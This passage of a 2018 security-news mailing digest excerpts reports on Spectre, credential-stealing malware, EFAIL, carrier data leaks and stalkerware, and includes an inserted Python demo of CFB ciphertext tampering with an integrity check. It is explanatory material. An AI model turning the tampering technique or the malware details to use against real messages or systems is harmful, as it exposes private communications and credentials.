    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db", "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges makes it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with the "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/
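
    The malleability and integrity-check behaviour the EFF piece describes, as an added example that is not EFF's, the researchers', or any OpenPGP implementation's code: a CFB mode built over a keyed PRF (CFB only ever runs the block cipher forwards, so HMAC-SHA256 stands in for AES and the example needs no third-party library), one tampered ciphertext block, and an encrypt-then-MAC wrapper that fails closed. The key, IV, message and the HMAC-based check are constructed stand-ins; OpenPGP's own integrity protection is the MDC, but the lesson is the same.

```python
import hashlib
import hmac

BLOCK = 16  # bytes per CFB block

# Constructed demo values (not from the paper or any real message).
DEMO_KEY = b"\x11" * 32
DEMO_IV = b"\x00" * BLOCK
DEMO_MSG = b"A" * BLOCK + b"B" * BLOCK + b"C" * BLOCK
DELTA = b"\x01" * BLOCK  # flips the low bit of every byte in one block


def block_fn(key: bytes, block: bytes) -> bytes:
    """Forward block function. CFB only ever runs the cipher forwards, so a
    keyed PRF (HMAC-SHA256 truncated to one block) stands in for AES here."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB encryption: C_i = P_i XOR E(C_{i-1}), with C_0 = IV."""
    out, prev = bytearray(), iv
    for i in range(0, len(plaintext), BLOCK):
        c = _xor(plaintext[i:i + BLOCK], block_fn(key, prev))
        out += c
        prev = c
    return bytes(out)


def cfb_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """CFB decryption: P_i = C_i XOR E(C_{i-1}). Block i's keystream depends
    only on ciphertext block i-1, which is exactly what makes the mode
    malleable: nothing here notices that a block was modified."""
    out, prev = bytearray(), iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out += _xor(c, block_fn(key, prev))
        prev = c
    return bytes(out)


def tamper_block(ciphertext: bytes, index: int, delta: bytes) -> bytes:
    """XOR a delta into one ciphertext block without knowing the key; this is
    the kind of ciphertext modification the EFF text describes."""
    start = index * BLOCK
    patched = _xor(ciphertext[start:start + BLOCK], delta)
    return ciphertext[:start] + patched + ciphertext[start + BLOCK:]


def changed_blocks(original: bytes, decrypted: bytes) -> list:
    """Indices of plaintext blocks that differ from the original. For a delta
    applied to ciphertext block j, expect j (same bits flipped) and j+1
    (garbled keystream); every later block still decrypts correctly."""
    n = (len(original) + BLOCK - 1) // BLOCK
    return [i for i in range(n)
            if original[i * BLOCK:(i + 1) * BLOCK]
            != decrypted[i * BLOCK:(i + 1) * BLOCK]]


def subkeys(key: bytes):
    """Separate encryption and MAC keys derived from one master key."""
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())


def seal(key: bytes, iv: bytes, plaintext: bytes):
    """Encrypt-then-MAC: the tag covers IV and ciphertext, so any change to
    either is detectable. (OpenPGP uses an MDC instead; the principle is the
    same: the integrity check must cover the whole ciphertext.)"""
    enc_key, mac_key = subkeys(key)
    ct = cfb_encrypt(enc_key, iv, plaintext)
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return ct, tag


def open_checked(key: bytes, iv: bytes, ciphertext: bytes, tag: bytes):
    """Fail closed: when the tag does not verify, return None and never hand
    any plaintext to the caller. Decrypting and displaying anyway (as the EFF
    text says some clients do) is what turns malleability into a leak."""
    enc_key, mac_key = subkeys(key)
    expected = hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return cfb_decrypt(enc_key, iv, ciphertext)


if __name__ == "__main__":
    ct = cfb_encrypt(DEMO_KEY, DEMO_IV, DEMO_MSG)
    bent = cfb_decrypt(DEMO_KEY, DEMO_IV, tamper_block(ct, 0, DELTA))
    print("blocks altered by tampering (no integrity check):",
          changed_blocks(DEMO_MSG, bent))  # [0, 1]
    sealed_ct, tag = seal(DEMO_KEY, DEMO_IV, DEMO_MSG)
    print("tampered sealed message accepted?",
          open_checked(DEMO_KEY, DEMO_IV,
                       tamper_block(sealed_ct, 0, DELTA), tag))  # None
```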

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    T-Mobile security lapse let anyone see customer account details

    T-Mobile bug let anyone see any customer's account details Exclusive: The
    exposed lookup tool let anyone run a customer's phone number -- and obtain
    their home address and account PIN, used to contact phone support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker on 17 May
    on the same subject:
    A bug in cell phone tracking firm's website leaked millions of Americans' real-time locations
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zack Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    Police can track any phone in the US in seconds — without a warrant

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times* revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zack Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    US cell carriers are selling access to your real-time phone location data

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    Hundreds of Apps Can Empower Stalkers to Track Their Victims

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    Hacks turn Amazon Alexa and Google Home into secret eavesdroppers

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    So, Umm, Google Duplex's Chatter Is Not Quite Human

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
    http://arstechnica.com/gadgets/2018...o-device-secretly-shared-users-private-audio/

    Amazon confirmed an Echo owner's privacy-sensitive allegation on Thursday,
    after Seattle CBS affiliate KIRO-7 reported that an Echo device in Oregon
    sent private audio to someone on a user's contact list without permission.
    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
